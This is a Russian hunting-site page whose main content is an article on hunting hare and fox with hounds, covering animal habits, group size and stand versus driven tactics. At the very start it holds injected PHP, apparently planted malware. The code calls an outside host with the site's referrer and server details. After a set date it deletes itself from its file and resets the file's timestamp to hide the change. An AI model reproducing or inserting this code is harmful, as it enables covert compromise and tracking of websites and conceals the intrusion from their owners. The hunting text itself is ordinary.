check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Способы Охоты С Гончей

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 3812 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

Способы Охоты С Гончей

Охота на зайца-беляка

Для того чтобы успешно охотиться на зайцев да и на других зверей, охотник должен знать их повадки. Не зная повадок зверя, охота на него редко бывает успешной. Заяц-беляк живет в лесу, но в разные времена года его можно найти в разных местах. Основную пищу беляка, живущего в лесных массивах, как правило, составляет древесная растительность: кора, листья и молодые побеги деревьев и кустарников. Летом он кормится еще и травянистой растительностью. Еду заяц-беляк достает на лесных полянах, лесосеках, проезжих дорогах.


Беляки, живущие в островных лесах, перемежающихся с полями, после уборки яровых переходят на опушки леса, примыкающие к озимым полям. Ночью они выходят кормиться на озимые. Пока не выпал глубокий снег беляки кормятся на озимых, с увеличением снегового покрова перемещаются вглубь леса, в осиновые насаждения, где основную пищу их составляют молодые побеги ивняка, осиновая кора. Беляки очень любят выходить кормиться на проезжие дороги, по которым возят сено, овсяную солому и другие корма. Места скопления беляка распознаются по многочисленной поеди на осинах и других деревьях и обилию помета.

Для успешной охоты на беляка уже в сентябре месяце в предполагаемых местах надо производить подрубку осин, они охотно поедают кору и побеги и держатся недалеко от места кормежки. После выпадения снега зайцы очень хорошо группируются около срубленных осин.

В сухую осень, когда мало выпадает осадков и в лесу сухо, заяц-беляк находится ближе к воде, болотам, сырым оврагам, по поймам лесных речушек. Если лес лиственный, то во время листопада из глубины леса зайцы выбираются к опушкам; беляки не любят шума как падающих листьев, так и капель дождя.

При наличии смешанного леса в период листопада заяц-беляк часто перебирается в хвойные места. Беляк обычно держится одного определенного района леса.

Кормится беляк ночью, днем лежит; место для лежки выбирает в густом подседе, старой траве, буреломе и особенно любит ложиться под вершинами срубленных деревьев. В конце осени беляки забираются в высокую траву, в хвойные поросли, осиновые вырубки. С выпадением снега беляк расширяет район жировок и ложится на день более открыто.

Охоту на беляков с гончей желательно проводить группой не более трех человек. Для достижения успеха в охоте в группу надо подбирать опытных, выдержанных охотников, знающих охоту с гончей, а также знающих повадки беляков.

Охота может быть как подвижная, т. е. ходовая, а также и неподвижная. Подвижной (ходовой) охотой называется такая охота, когда охотники идут по лесу врассыпную цепью, метров 75—80 друг от друга. Ведущий собаки (ее владелец) должен идти в середине этой цепи и порскать, он и держит основное направление движения. Остальные охотники придерживаются его. При этом другим охотникам, кроме ведущего собаку, кричать и порскать не рекомендуется. Если из-под кого-нибудь выскочит заяц или кто-нибудь перевидит зверя, а гончая еще его не гонит, охотник должен наманить на след гончую. Если это заяц и гончая, приняв след, погнала его, нужно помнить, что беляк первый круг делает, как правило, небольшой и возвращается к месту своей лежки. Поэтому охотники должны быстро продвинуться к месту подъема зайца и, затаившись, подождать. Зверь, возвращаясь к лежке, попадает под выстрел кого-либо из охотников. Если заяц не был убит на первом круге, то второй и последующий круги он делает более широкие; по ходу гона охотники должны продвинуться поближе под собак, выбрать более удобное место для перехвата зверя, какую-нибудь дорогу, просеку или визир и, затаившись, ждать его появления. Если лес островной, разделенный полянкой или полем, то беляка надо ждать там, где сходятся выступающие мысами края леса.

Необходимо учитывать также, в какое время года ведется охота. Если лес лиственный и начался листопад, то в таких местах беляк из-под гончих долго не задерживается. В еловых лесах с густым подседом молодого ельника беляк любит ходить долго и с небольшой охотой покидает такие места. В туманные, тихие, теплые и осенние дни беляк лежит очень плотно и часто вскакивает прямо из-под ног. В сухие морозные, ветреные дни заяц лежит, как говорят охотники, «строго» и поднимается от собак и охотника далеко.

В настоящее время, как правило, неподвижная охота может проводиться с гончими на лисьих норах и по волкам. При неподвижной охоте охотники становятся на свои, заранее намеченные места, и уже не сходят с них во все время охоты. Таким способом охоты пользуются тогда, когда в ней участвует большое количество охотников и когда охота производится исключительно по красному зверю.

Охота На Зайца-Русака

Заяц-русак широко распространен в лесостепной и степной полосе. Обитает в небольших лесных островах и перелесках. Старые русские псовые охотники насчитывали до пяти типов русаков, разделяющихся в основном по местам обитания (ковыльник, опушечник, гуменник, овражник, полевой). В настоящее время охотники разделяют русаков на два типа: полевого и лесного. Лесной — русак (опушечник) с несколько темным окрасом, другой — полевой значительно светлее, и зимой, когда он вылинивает, кажется голубым.

В основном заяц-русак обитает на полях и на опушках леса, в оврагах. Осенью русак любит лежать в пахоте или на поднятом на зиму пару, ложится он и на озимых полях.

На открытых больших полях охота с гончими по русаку не представляет большого интереса, так как там трудно подставиться под зверя или перехватить его. Но вот на лесных островах, перемежающихся с полями и оврагами, охота с гончими на русака бывает весьма успешной. Русак на дневку ложится в открытых местах: в полях на опушке леса, в овраге с заветренной стороны. Любит он ложиться в отдельный куст или под одиноко стоящее дерево. Как осенью, так и зимой русак меняет место лежек в зависимости от погоды.

Охота по русаку ведется в основном ходовым способом. Поднятый с лежки полевой русак как осенью, так и в начале зимы предпочитает ходить из-под гончих полями. В период глубокого снега заяц-русак любит ходить по полевым дорогам, гумнам, заходить даже в населенные пункты. Лесной русак (опушечник) всегда стремится к лесу, предпочитая там открытые места, на которых остается меньше запаха. Русак в отличие от беляка ходит широкими кругами.

Лаз (ход) русака отличен от беляка. Если беляк ходит из-под гончих из острова в остров в самом узком проходе, то русак пройдет в самом широком месте. Русак любит ходить низинами, дном оврага, пройдя дорогой иногда большое расстояние, скинется и недалеко западает. Поэтому гончая при работе по русаку должна уметь работать на дорогах по черной тропе, так как в порошу собака работает не только чутьем, но и зрением, и ей легче найти скидку зверя с дороги.

Трудность гона по русаку состоит в том, что он пользуется часто дорогами, переходя с одной на другую, а гончим по дорогам работать трудно. Успешной охота бывает на овражистых местах с небольшими отдельными перелесками. Охотники группами два-три человека, набросив гончую в овраг, продвигаются верхом по его сторонам. Побуженный гончей русак с подъема очень часто выходит из оврага в поле, охотник в это время старается его перехватить и убить. Если же его не удалось подстрелить с подъема, русак, сделав небольшой круг в поле, вернется в овраг и начнет ходить косогорами, где легко попадет под ружье охотника.

При охоте на русаков можно очень хорошо использовать дороги, особенно их перекрестки, когда земля покроется глубоким снежным покровом, применив при этом метод неподвижной охоты. Зная места кормежки и дневки русака, выбирают те места на дороге, где она проходит кустами или опушкой леса. По следам определяют направление ухода зверя. В выбранных местах на дорогах расставляют охотников, а один ведущий с собаками заходит с противоположной стороны и от предполагаемых мест залегания русака набрасывает гончих и двигается с ними по направлению к охотникам. Побуженный собаками русак выскакивает на дорогу и по ней бежит, преследуемый гончей, таким образом попадая на кого-нибудь из охотников.

Удачно можно поохотиться на русака лесного (опушечника) по свежей пороше. По большому снегу русак часто кормится около деревни на току возле скирд, а также по дорогам, идущим от деревни в лес, ложится он чаще всего на опушку. Эту охоту хорошо проводить группой. Найдя свежую жировку русака и отобрав его выходной след на лежку, надо поставить несколько человек на выходящие из леса нахоженные тропинки и дороги, лучше всего на перекресток дорог. Один из охотников, ведя гончую на сворке, идет по выходному следу русака, который выйдет обязательно на одну из дорог, дойдя по его следу до скидки, набрасывает гончую. Русак, как правило, скинувшись с дороги, лежит недалеко, собака быстро его поднимает и гонит.

Побуженный русак выходит на дорогу, пытается уйти от собаки. Идет он всегда из глубины леса к опушке, таким образом попадая под выстрел охотника. Однажды на охоте со смычком гончих в Ярославской области автору этих строк удалось таким способом убить с одного места трех русаков подряд.

С выпадением большого снега, с усилением морозов и появлением крепкого наста охота на русака с гончими практически прекращается, так как на насте остается мало запаха от следа зверя, наст зверя держит, а собака проваливается и не в состоянии долго работать.

Охота на лисиц

Охота с гончими на лисицу в центральной полосе широко распространена и пользуется большой популярностью среди охотников-гончатников. В настоящее время подавляющее большинство гончих хорошо работают по лисице. Однако среди немалого количества охотников распространено мнение, что лисица портит охоту, что она уводит собак и зря поэтому пропадает много драгоценного времени. Происходит это потому, что охотники плохо знают этого зверя, местность, где обитают лисицы, их основные ходы. Гончие гонят лисицу азартно, без больших перемолчек, гон идет всегда ровный и яркий. Собаки ярче отдают голоса, причем лисицу гонят совершенно иными голосами, чем по зайцу.

Охота на лисиц с гончими может быть как неподвижной, так и ходовой. Все зависит от обстоятельств. Если вы хорошо знаете норы лисиц, то ранней осенью можно хорошо охотиться на норах неподвижным способом. Более глубокой осенью и зимой охота на лисиц ведется и ходовым способом. Для охоты на лисицу никогда не надо собирать большой компании охотников, успешнее бывает охота группой в 2—3 человека. Охотники должны подбираться опытные, хорошо знающие зверя и охоту с гончими. Ранней осенью молодые лисицы жируют недалеко от нор. Зная места расположения нор лисиц, нужно рано, почти что затемно, прийти к норам и, нарубив лапника или других веток, заткнуть ими выходы из нор. Охотникам надо остаться в районе нор, около лазов. Одному же из них с гончей на сворке необходимо направиться к опушке леса, прилегающей к полю, и там, набросив гончую, начать движение вдоль опушки, не поднимая лишнего шума, негромко порская и посвистывая, чтобы гончая могла выдерживать направление ведущего. Делая крут в районе нор, гончая натечет на след, доберет ее и начнет гнать. Лисица, сделав круг или два, пойдет на норы и там где-нибудь на лазу попадет под выстрел охотника. Убив одну лисицу, охотники должны снова с гончей продолжать поиск. Таким способом охоты удавалось осенью взять за одно утро до трех лисиц.

Осенью, когда молодые лисицы взматереют, в норы они заходят уже редко и избирают для дневок плотные густые заросли леса, особенно они любят лежать в густом плотном ельнике. Перед дождем лисы ложатся на открытых местах.

Глубокой осенью или зимой, когда в лесу добыть корм лисице становится практически почти невозможно, она усиленно мышкует и совсем переселяется в поля. Где есть болота, лисица любит держаться вблизи их и выжить ее из этих мест бывает для гончих не всегда легким делом.

Лисица часто ложится в бурьянах, на заросших местах, в балках и овражках. Район обитания у лисицы значительно шире, чем у зайца. Это зверь осторожный и сметливый. Как уже было сказано ранее, охотиться на лисиц надо очень осторожно. Охотясь за ней, не следует громко порскать, так как можно подшуметь. Лисица заранее сойдет с лежки и уйдет, гончим потом придется долго по следу добирать ее.

На ходовой охоте по лисам следует охотиться также небольшой группой по 2—3 человека. Рано утром лисица мышкует на поле, и охоту надо начинать с поля от опушки леса.

Гончие, попав на нарыск, начнут настойчиво добираться до убегающего зверя, если он еще на ходу, или до его лежки. Как правило, гончие, попав на лисий нарыск, начинают добирать, отдавать голос, но он совершенно отличен от добора по зайцу. По лисьему нарыску гончая, отдавая голос, быстро продвигается вперед. Охотникам в таком случае следует без шума продвигаться за собакой, и если гон направляется в крепь, лесное болото или частый ельник, становясь все азартнее, необходимо рассыпаться и занять места вероятного хода зверя. Лисица под гоном собак не сдваивает и не страивает свои следы, как это делает заяц. Но зато она способна пройти скрытно бороздой по полю или пройти водой и уйти через речку, а также пройти по полотну железной дороги, затрудняя работу гончих.

Лисица под гоном ходит значительно шире зайца, часто делает большие крути, уходя от слуха охотника. Иногда лисица, пытаясь отделаться от гончих, уходит напрямик на 5—6 м, забравшись в крепкое место, начинает там кружить. Поведение лисицы под гоном может быть самое разнообразное, зависящее от местности, возраста зверя, погоды, была ли ранее эта лисица гонная гончими, зависит и от собак, параты они или нет. Если гончие не паратые, то ходовая охота может перейти в неподвижную. Лисица под такими гончими идет своими излюбленными лазами, лощинками, овражками, рытвинами, т. е. такими местами, где она может проскользнуть незамеченной. Поэтому охотники по возможности должны занять эти лазы и, спокойно затаившись, ждать появления зверя.

Если же гончие паратые и, как говорят охотники, «висят» на хвосте у лисицы, то ей некогда особенно выбирать места. Она от гончей уходит «полными ногами», не успевая выбрать путь движения. При охоте с такими гончими охотники должны продвигаться навстречу гона и по мере его приближения выбрать просеку, дорогу, визирку, остановиться и ждать появления лисицы, а если есть норы, то хорошо встать так, чтобы стрелки оказались между норами и гоном. Нередко лисица из-под азартного гона смычка или пары, сделав два, три круга в острове, пытается занориться и, направляясь к норе, попадает под выстрел охотника. Описать разнообразные моменты, которые встречаются на охоте вообще, не представляется возможным.

Охота зависит от опыта и находчивости охотника. Опыт приходит с практикой и настойчивостью, умением хорошо подготовить к охоте своих гончих.

Охотничья страсть, воля и настойчивость к достижению поставленной цели помогут охотнику познать все тонкости охоты с гончими. Не падайте духом при неудачах, все приходит не сразу — время скажет свое слово.

 


AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить